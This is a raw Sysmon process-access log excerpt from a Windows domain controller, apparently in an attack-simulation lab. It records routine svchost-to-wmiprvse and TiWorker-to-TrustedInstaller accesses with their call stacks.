13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.279{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:32.248{08A6967A-4752-6000-0805-000000009A01}38325064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{08A6967A-4752-6000-0705-000000009A01}5044C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000012912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 